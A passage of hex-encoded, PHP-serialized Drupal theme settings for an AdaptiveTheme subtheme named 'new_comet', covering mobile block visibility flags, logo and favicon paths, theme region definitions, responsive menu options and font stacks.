6c655f626c6f636b5f73686f775f62706d6f62696c655f6c6f63616c5f7461736b735f626c6f636b223b693a303b733a34343a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f6c6f63616c5f7461736b735f626c6f636b223b693a303b733a34333a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f757365725f6c6f67696e5f626c6f636b223b693a303b733a34333a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f757365725f6c6f67696e5f626c6f636b223b693a303b733a34393a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f73797374656d5f6d656e755f626c6f636b5f6d61696e223b693a303b733a34393a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f73797374656d5f6d656e755f626c6f636b5f6d61696e223b693a303b733a34383a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f73797374656d5f6d657373616765735f626c6f636b223b693a303b733a34383a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f73797374656d5f6d657373616765735f626c6f636b223b693a303b733a34333a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f706167655f7469746c655f626c6f636b223b693a303b733a34333a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f706167655f7469746c655f626c6f636b223b693a303b733a34343a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f7365617263685f666f726d5f626c6f636b223b693a303b733a34343a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f7365617263685f666f726d5f626c6f636b223b693a303b733a35303a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f73797374656d5f6d656e755f626c6f636b5f746f6f6c73223b693a303b733a35303a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f73797374656d5f6d656e755f626c6f636b5f746f6f6c73223b693a303b733a35353a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f76696577735f626c6f636b5f61637469766974792d626c6f636b5f31223b693a303b733a35353a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f76696577735f626c6f636b5f61637469766974792d626c6f636b5f31223b693a303b733a35393a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f76696577735f626c6f636b5f616e6e6f756e63656d656e742d626c6f636b5f31223b693a303b733a35393a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f76696577735f626c6f636b5f616e6e6f756e63656d656e742d626c6f636b5f31223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f65636436343163332d383266312d343936392d383162302d316166656634376465316331223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f65636436343163332d383266312d343936392d383162302d316166656634376465316331223b693a303b733a32313a2273686f775f706167655f73756767657374696f6e73223b693a303b733a31363a2273686f775f77696e646f775f73697a65223b693a303b733a31383a22656e61626c655f6c6976655f72656c6f6164223b693a303b733a31323a226e756b655f746f6f6c626172223b693a303b733a35393a226d6f62696c655f626c6f636b5f73686f775f6270776964655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f31223b693a303b733a35393a226d6f62696c655f626c6f636b5f686964655f6270776964655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f31223b693a303b733a35393a226d6f62696c655f626c6f636b5f73686f775f6270776964655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f32223b693a303b733a35393a226d6f62696c655f626c6f636b5f686964655f6270776964655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f32223b693a303b733a36393a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f31223b693a303b733a36393a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f31223b693a303b733a36393a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f32223b693a303b733a36393a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f32223b693a303b733a36313a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f31223b693a303b733a36313a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f31223b693a303b733a36313a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f32223b693a303b733a36313a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f32223b693a303b733a37353a226d6f62696c655f626c6f636b5f73686f775f6270776964655f626c6f636b5f636f6e74656e745f64306338303231382d363837372d343634612d613264382d633535663631353532643236223b693a303b733a37353a226d6f62696c655f626c6f636b5f686964655f6270776964655f626c6f636b5f636f6e74656e745f64306338303231382d363837372d343634612d613264382d633535663631353532643236223b693a303b733a37353a226d6f62696c655f626c6f636b5f73686f775f6270776964655f626c6f636b5f636f6e74656e745f34306162636637652d393235622d346561382d623762302d323730376363623864366630223b693a303b733a37353a226d6f62696c655f626c6f636b5f686964655f6270776964655f626c6f636b5f636f6e74656e745f34306162636637652d393235622d346561382d623762302d323730376363623864366630223b693a303b733a37353a226d6f62696c655f626c6f636b5f73686f775f6270776964655f626c6f636b5f636f6e74656e745f39623462633565332d376635342d346137652d613435612d353362333439363332343939223b693a303b733a37353a226d6f62696c655f626c6f636b5f686964655f6270776964655f626c6f636b5f636f6e74656e745f39623462633565332d376635342d346137652d613435612d353362333439363332343939223b693a303b733a37353a226d6f62696c655f626c6f636b5f73686f775f6270776964655f626c6f636b5f636f6e74656e745f66346432333239332d623330332d343063342d616535302d646534616163366131623239223b693a303b733a37353a226d6f62696c655f626c6f636b5f686964655f6270776964655f626c6f636b5f636f6e74656e745f66346432333239332d623330332d343063342d616535302d646534616163366131623239223b693a303b733a38353a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f64306338303231382d363837372d343634612d613264382d633535663631353532643236223b693a303b733a38353a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f64306338303231382d363837372d343634612d613264382d633535663631353532643236223b693a303b733a38353a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f34306162636637652d393235622d346561382d623762302d323730376363623864366630223b693a303b733a38353a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f34306162636637652d393235622d346561382d623762302d323730376363623864366630223b693a303b733a38353a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f39623462633565332d376635342d346137652d613435612d353362333439363332343939223b693a303b733a38353a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f39623462633565332d376635342d346137652d613435612d353362333439363332343939223b693a303b733a38353a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f66346432333239332d623330332d343063342d616535302d646534616163366131623239223b693a303b733a38353a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f66346432333239332d623330332d343063342d616535302d646534616163366131623239223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f64306338303231382d363837372d343634612d613264382d633535663631353532643236223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f64306338303231382d363837372d343634612d613264382d633535663631353532643236223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f34306162636637652d393235622d346561382d623762302d323730376363623864366630223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f34306162636637652d393235622d346561382d623762302d323730376363623864366630223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f39623462633565332d376635342d346137652d613435612d353362333439363332343939223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f39623462633565332d376635342d346137652d613435612d353362333439363332343939223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f66346432333239332d623330332d343063342d616535302d646534616163366131623239223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f66346432333239332d623330332d343063342d616535302d646534616163366131623239223b693a303b733a33313a22696d6167655f63617074696f6e735f736c696465725f6e6f64655f66756c6c223b693a303b733a33333a22696d6167655f63617074696f6e735f736c696465725f6e6f64655f746561736572223b693a303b733a33323a22696d6167655f63617074696f6e735f736c696465725f6e6f64655f746f6b656e223b693a303b733a32383a22696d6167655f636f756e745f736c696465725f6e6f64655f66756c6c223b693a303b733a33303a22696d6167655f636f756e745f736c696465725f6e6f64655f746561736572223b693a303b733a32393a22696d6167655f636f756e745f736c696465725f6e6f64655f746f6b656e223b693a303b733a37353a226d6f62696c655f626c6f636b5f73686f775f6270776964655f626c6f636b5f636f6e74656e745f39356234663237392d646134352d343165362d393537382d313733633334663232363731223b693a303b733a37353a226d6f62696c655f626c6f636b5f686964655f6270776964655f626c6f636b5f636f6e74656e745f39356234663237392d646134352d343165362d393537382d313733633334663232363731223b693a303b733a37353a226d6f62696c655f626c6f636b5f73686f775f6270776964655f626c6f636b5f636f6e74656e745f36613434636562392d336132632d343533622d613638322d393464616239393666373639223b693a303b733a37353a226d6f62696c655f626c6f636b5f686964655f6270776964655f626c6f636b5f636f6e74656e745f36613434636562392d336132632d343533622d613638322d393464616239393666373639223b693a303b733a37353a226d6f62696c655f626c6f636b5f73686f775f6270776964655f626c6f636b5f636f6e74656e745f32633637616533302d363630622d346537642d623530622d663963666536323061663231223b693a303b733a37353a226d6f62696c655f626c6f636b5f686964655f6270776964655f626c6f636b5f636f6e74656e745f32633637616533302d363630622d346537642d623530622d663963666536323061663231223b693a303b733a36373a226d6f62696c655f626c6f636b5f73686f775f6270776964655f6c616e67756167655f64726f70646f776e5f626c6f636b5f6c616e67756167655f696e74657266616365223b693a303b733a36373a226d6f62696c655f626c6f636b5f686964655f6270776964655f6c616e67756167655f64726f70646f776e5f626c6f636b5f6c616e67756167655f696e74657266616365223b693a303b733a37353a226d6f62696c655f626c6f636b5f73686f775f6270776964655f626c6f636b5f636f6e74656e745f31333863336133352d626232642d343163392d393066322d633431306331653439653261223b693a303b733a37353a226d6f62696c655f626c6f636b5f686964655f6270776964655f626c6f636b5f636f6e74656e745f31333863336133352d626232642d343163392d393066322d633431306331653439653261223b693a303b733a37353a226d6f62696c655f626c6f636b5f73686f775f6270776964655f626c6f636b5f636f6e74656e745f62333031373461632d326334642d346166302d383335612d633633633737313936663035223b693a303b733a37353a226d6f62696c655f626c6f636b5f686964655f6270776964655f626c6f636b5f636f6e74656e745f62333031373461632d326334642d346166302d383335612d633633633737313936663035223b693a303b733a35313a226d6f62696c655f626c6f636b5f73686f775f6270776964655f76696577735f626c6f636b5f736c696465722d626c6f636b5f31223b693a303b733a35313a226d6f62696c655f626c6f636b5f686964655f6270776964655f76696577735f626c6f636b5f736c696465722d626c6f636b5f31223b693a303b733a38353a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f39356234663237392d646134352d343165362d393537382d313733633334663232363731223b693a303b733a38353a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f39356234663237392d646134352d343165362d393537382d313733633334663232363731223b693a303b733a38353a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f36613434636562392d336132632d343533622d613638322d393464616239393666373639223b693a303b733a38353a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f36613434636562392d336132632d343533622d613638322d393464616239393666373639223b693a303b733a38353a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f32633637616533302d363630622d346537642d623530622d663963666536323061663231223b693a303b733a38353a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f32633637616533302d363630622d346537642d623530622d663963666536323061663231223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f6c616e67756167655f64726f70646f776e5f626c6f636b5f6c616e67756167655f696e74657266616365223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f6c616e67756167655f64726f70646f776e5f626c6f636b5f6c616e67756167655f696e74657266616365223b693a303b733a38353a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f31333863336133352d626232642d343163392d393066322d633431306331653439653261223b693a303b733a38353a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f31333863336133352d626232642d343163392d393066322d633431306331653439653261223b693a303b733a38353a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f62333031373461632d326334642d346166302d383335612d633633633737313936663035223b693a303b733a38353a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f62333031373461632d326334642d346166302d383335612d633633633737313936663035223b693a303b733a36313a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f76696577735f626c6f636b5f736c696465722d626c6f636b5f31223b693a303b733a36313a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f76696577735f626c6f636b5f736c696465722d626c6f636b5f31223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f39356234663237392d646134352d343165362d393537382d313733633334663232363731223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f39356234663237392d646134352d343165362d393537382d313733633334663232363731223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f36613434636562392d336132632d343533622d613638322d393464616239393666373639223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f36613434636562392d336132632d343533622d613638322d393464616239393666373639223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f32633637616533302d363630622d346537642d623530622d663963666536323061663231223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f32633637616533302d363630622d346537642d623530622d663963666536323061663231223b693a303b733a36393a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f6c616e67756167655f64726f70646f776e5f626c6f636b5f6c616e67756167655f696e74657266616365223b693a303b733a36393a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f6c616e67756167655f64726f70646f776e5f626c6f636b5f6c616e67756167655f696e74657266616365223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f31333863336133352d626232642d343163392d393066322d633431306331653439653261223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f31333863336133352d626232642d343163392d393066322d633431306331653439653261223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f62333031373461632d326334642d346166302d383335612d633633633737313936663035223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f62333031373461632d326334642d346166302d383335612d633633633737313936663035223b693a303b733a35333a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f76696577735f626c6f636b5f736c696465722d626c6f636b5f31223b693a303b733a35333a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f76696577735f626c6f636b5f736c696465722d626c6f636b5f31223b693a303b733a37353a226d6f62696c655f626c6f636b5f73686f775f6270776964655f626c6f636b5f636f6e74656e745f61396238303430612d663033662d343261612d623565382d613633656466383561386164223b693a303b733a37353a226d6f62696c655f626c6f636b5f686964655f6270776964655f626c6f636b5f636f6e74656e745f61396238303430612d663033662d343261612d623565382d613633656466383561386164223b693a303b733a37353a226d6f62696c655f626c6f636b5f73686f775f6270776964655f626c6f636b5f636f6e74656e745f38663266383436352d663139362d343433612d613865372d623738393963633531353230223b693a303b733a37353a226d6f62696c655f626c6f636b5f686964655f6270776964655f626c6f636b5f636f6e74656e745f38663266383436352d663139362d343433612d613865372d623738393963633531353230223b693a303b733a37353a226d6f62696c655f626c6f636b5f73686f775f6270776964655f626c6f636b5f636f6e74656e745f30373633373339352d353338392d343263382d613235632d353436393734373138376664223b693a303b733a37353a226d6f62696c655f626c6f636b5f686964655f6270776964655f626c6f636b5f636f6e74656e745f30373633373339352d353338392d343263382d613235632d353436393734373138376664223b693a303b733a38353a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f61396238303430612d663033662d343261612d623565382d613633656466383561386164223b693a303b733a38353a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f61396238303430612d663033662d343261612d623565382d613633656466383561386164223b693a303b733a38353a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f38663266383436352d663139362d343433612d613865372d623738393963633531353230223b693a303b733a38353a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f38663266383436352d663139362d343433612d613865372d623738393963633531353230223b693a303b733a38353a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f30373633373339352d353338392d343263382d613235632d353436393734373138376664223b693a303b733a38353a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f30373633373339352d353338392d343263382d613235632d353436393734373138376664223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f61396238303430612d663033662d343261612d623565382d613633656466383561386164223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f61396238303430612d663033662d343261612d623565382d613633656466383561386164223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f38663266383436352d663139362d343433612d613865372d623738393963633531353230223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f38663266383436352d663139362d343433612d613865372d623738393963633531353230223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f30373633373339352d353338392d343263382d613235632d353436393734373138376664223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f30373633373339352d353338392d343263382d613235632d353436393734373138376664223b693a303b733a37353a226d6f62696c655f626c6f636b5f73686f775f6270776964655f626c6f636b5f636f6e74656e745f34356230386164302d613231372d343363392d613335642d633565396634646362306162223b693a303b733a37353a226d6f62696c655f626c6f636b5f686964655f6270776964655f626c6f636b5f636f6e74656e745f34356230386164302d613231372d343363392d613335642d633565396634646362306162223b693a303b733a37353a226d6f62696c655f626c6f636b5f73686f775f6270776964655f626c6f636b5f636f6e74656e745f39393061333931322d346636352d343833612d383338382d653264616239396661316663223b693a303b733a37353a226d6f62696c655f626c6f636b5f686964655f6270776964655f626c6f636b5f636f6e74656e745f39393061333931322d346636352d343833612d383338382d653264616239396661316663223b693a303b733a37353a226d6f62696c655f626c6f636b5f73686f775f6270776964655f626c6f636b5f636f6e74656e745f64643132383365312d623365352d346265662d383464652d303963316438393238346166223b693a303b733a37353a226d6f62696c655f626c6f636b5f686964655f6270776964655f626c6f636b5f636f6e74656e745f64643132383365312d623365352d346265662d383464652d303963316438393238346166223b693a303b733a38353a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f34356230386164302d613231372d343363392d613335642d633565396634646362306162223b693a303b733a38353a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f34356230386164302d613231372d343363392d613335642d633565396634646362306162223b693a303b733a38353a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f39393061333931322d346636352d343833612d383338382d653264616239396661316663223b693a303b733a38353a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f39393061333931322d346636352d343833612d383338382d653264616239396661316663223b693a303b733a38353a226d6f62696c655f626c6f636b5f73686f775f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f64643132383365312d623365352d346265662d383464652d303963316438393238346166223b693a303b733a38353a226d6f62696c655f626c6f636b5f686964655f62707461626c65742d69736f6c6174655f626c6f636b5f636f6e74656e745f64643132383365312d623365352d346265662d383464652d303963316438393238346166223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f34356230386164302d613231372d343363392d613335642d633565396634646362306162223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f34356230386164302d613231372d343363392d613335642d633565396634646362306162223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f39393061333931322d346636352d343833612d383338382d653264616239396661316663223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f39393061333931322d346636352d343833612d383338382d653264616239396661316663223b693a303b733a37373a226d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f64643132383365312d623365352d346265662d383464652d303963316438393238346166223b693a303b733a37373a226d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f64643132383365312d623365352d346265662d383464652d303963316438393238346166223b693a303b7d733a383a226665617475726573223b613a353a7b733a343a226c6f676f223b693a313b733a31373a226e6f64655f757365725f70696374757265223b693a313b733a32303a22636f6d6d656e745f757365725f70696374757265223b693a313b733a32353a22636f6d6d656e745f757365725f766572696669636174696f6e223b693a313b733a373a2266617669636f6e223b693a313b7d733a343a226c6f676f223b613a323a7b733a31313a227573655f64656661756c74223b693a303b733a343a2270617468223b733a32393a227075626c69633a2f2f6e65775f636f6d65745f6c6f676f5f302e6a7067223b7d733a373a2266617669636f6e223b613a333a7b733a31313a227573655f64656661756c74223b693a303b733a343a2270617468223b733a32323a227075626c69633a2f2f66617669636f6e5f302e69636f223b733a383a226d696d6574797065223b733a32343a22696d6167652f766e642e6d6963726f736f66742e69636f6e223b7d733a32393a2273657474696e67735f67656e6572617465645f66696c65735f70617468223b733a33373a227468656d65732f6e65775f636f6d65742f7374796c65732f6373732f67656e657261746564223b733a393a226c6973745f696e666f223b733a313639373a226e616d653a206e65772d636f6d65740a76657273696f6e3a20382e782d312e300a747970653a207468656d650a2762617365207468656d65273a2061745f636f72650a2762617365207468656d65206f726967696e616c273a20382e782d352e310a277375627468656d652074797065273a2061646170746976655f7375627468656d650a6c61796f75743a20706167652d6c61796f75740a6465736372697074696f6e3a2027426173653a2061745f636f72652028382e782d352e3129203c62723e47656e6572617465643a204d6f6e203173742c204d61792c2032303233202d2032313a3439270a636f72655f76657273696f6e5f726571756972656d656e743a20275e38207c7c205e39270a726567696f6e733a0a20206c6561646572626f6172643a204c6561646572626f6172640a20206865616465725f66697273743a2027486561646572206669727374270a20206865616465725f7365636f6e643a2027486561646572207365636f6e64270a20206e61766261723a204e61766261720a2020686967686c6967687465643a20486967686c6967687465640a202066656174757265735f66697273743a20274665617475726573206669727374270a202066656174757265735f7365636f6e643a20274665617475726573207365636f6e64270a202066656174757265735f74686972643a20274665617475726573207468697264270a2020636f6e74656e745f7072656669783a2027436f6e74656e7420707265666978270a2020636f6e74656e743a20274d61696e20636f6e74656e74270a2020736964656261725f66697273743a202753696465626172206669727374270a2020736964656261725f7365636f6e643a202753696465626172207365636f6e64270a2020636f6e74656e745f7375666669783a2027436f6e74656e7420737566666978270a202073756266656174757265735f66697273743a20275375622d6665617475726573206669727374270a202073756266656174757265735f7365636f6e643a20275375622d6665617475726573207365636f6e64270a202073756266656174757265735f74686972643a20275375622d6665617475726573207468697264270a202073756266656174757265735f666f757274683a20275375622d666561747572657320666f75727468270a2020666f6f7465725f66697273743a2027466f6f746572206669727374270a2020666f6f7465725f7365636f6e643a2027466f6f746572207365636f6e64270a2020666f6f7465723a20466f6f7465720a2020706167655f746f703a20275061676520746f70270a2020706167655f626f74746f6d3a20275061676520626f74746f6d270a746167733a202761646170746976657468656d65207375622d7468656d65270a6c69627261726965732d657874656e643a0a2020717569636b656469742f717569636b656469743a0a202020202d206e65775f636f6d65742f717569636b656469740a7374796c657368656574732d72656d6f76653a0a20202d202740737461626c652f6373732f6e6f64652f6e6f64652e707265766965772e637373270a20202d202740737461626c652f6373732f6e6f64652f6e6f64652e6d6f64756c652e637373270a20202d202740737461626c652f6373732f76696577732f76696577732e6d6f64756c652e637373270a20202d202740737461626c652f6373732f73797374656d2f636f6d706f6e656e74732f7461626c65736f72742e6d6f64756c652e637373270a20202d202740636c617373792f6373732f636f6d706f6e656e74732f66696c652e637373270a66656174757265733a0a20202d206c6f676f0a20202d2066617669636f6e0a20202d206e6f64655f757365725f706963747572650a20202d20636f6d6d656e745f757365725f706963747572650a20202d20636f6d6d656e745f757365725f766572696669636174696f6e0a636f72655f696e636f6d70617469626c653a2066616c73650a6c6966656379636c653a20737461626c650a6d74696d653a20313639393135363432340a656e67696e653a20747769670a73637265656e73686f743a207468656d65732f6e65775f636f6d65742f73637265656e73686f742e706e670a7068703a20372e332e300a6c69627261726965733a207b20207d0a6c69627261726965735f657874656e643a207b20207d0a6c69627261726965735f6f766572726964653a207b20207d0a646570656e64656e636965733a0a20202d2061745f636f72650a726567696f6e735f68696464656e3a0a20202d20706167655f746f700a20202d20706167655f626f74746f6d0a223b733a32393a2273657474696e67735f657874656e73696f6e735f666f726d5f6f70656e223b693a313b733a32363a2273657474696e67735f656e61626c655f657874656e73696f6e73223b693a313b733a33323a2273657474696e67735f656e61626c655f726573706f6e736976655f6d656e7573223b693a313b733a32323a2273657474696e67735f656e61626c655f696d61676573223b693a313b733a32373a2273657474696e67735f656e61626c655f746f7563685f69636f6e73223b693a313b733a32313a2273657474696e67735f656e61626c655f666f6e7473223b693a313b733a32323a2273657474696e67735f656e61626c655f7469746c6573223b693a313b733a32363a2273657474696e67735f656e61626c655f73686f7274636f646573223b693a303b733a32363a2273657474696e67735f656e61626c655f736c69646573686f7773223b693a313b733a32393a2273657474696e67735f656e61626c655f6d6f62696c655f626c6f636b73223b693a313b733a32363a2273657474696e67735f656e61626c655f637573746f6d5f637373223b693a313b733a32343a2273657474696e67735f656e61626c655f636b656469746f72223b693a303b733a32313a2273657474696e67735f656e61626c655f646576656c223b693a313b733a33313a2273657474696e67735f656e61626c655f6c65676163795f62726f7773657273223b693a303b733a33323a2273657474696e67735f656e61626c655f6d61726b75705f6f7665727269646573223b693a303b733a33303a2273657474696e67735f726573706f6e736976655f6d656e755f626c6f636b223b733a31393a226e65775f636f6d65745f6d61696e5f6d656e75223b733a34313a2273657474696e67735f726573706f6e736976655f6d656e755f627265616b706f696e745f67726f7570223b733a31343a2261745f636f72652e73696d706c65223b733a33353a2273657474696e67735f726573706f6e736976655f6d656e755f627265616b706f696e74223b733a33303a22616c6c20616e6420286d696e2d77696474683a2036302e30363235656d29223b733a33383a2273657474696e67735f726573706f6e736976655f6d656e755f64656661756c745f7374796c65223b733a393a22736c696465646f776e223b733a34313a2273657474696e67735f726573706f6e736976655f6d656e755f726573706f6e736976655f7374796c65223b733a383a2264726f706d656e75223b733a32383a2273657474696e67735f636c69636b5f6d656e75735f656e61626c6564223b693a313b733a32313a2273657474696e67735f666f6e745f77656273616665223b733a3332393a2256657264616e612c2047656e6576612c2073616e732d73657269663b0d0a2248656c766574696361204e657565222c2048656c7665746963612c20417269616c2c2073616e732d73657269663b0d0a225365676f65205549222c205365676f652c2047656e6576612c205461686f6d612c2073616e732d73657269663b0d0a496d706163742c202248656c76657469636120496e7365726174222c2022417269616c20426c61636b222c2073616e732d73657269663b0d0a47656f726769612c2055746f7069612c2050616c6174696e6f2c202250616c6174696e6f204c696e6f74797065222c2073657269663b0d0a2254696d6573204e657720526f6d616e222c2054696d65732c2073657269663b0d0a22436f7572696572204e6577222c20436f75726965722c206d6f6e6f73706163653b0d0a73616e732d73657269663b0d0a73657269663b223b733a32303a2273657474696e67735f666f6e745f676f6f676c65223b733a303a22223b733a32363a2273657474696e67735f666f6e745f676f6f676c655f6e616d6573223b733a303a22223b733a32313a2273657474696e67735f666f6e745f747970656b6974223b733a303a22223b733a32373a22736574746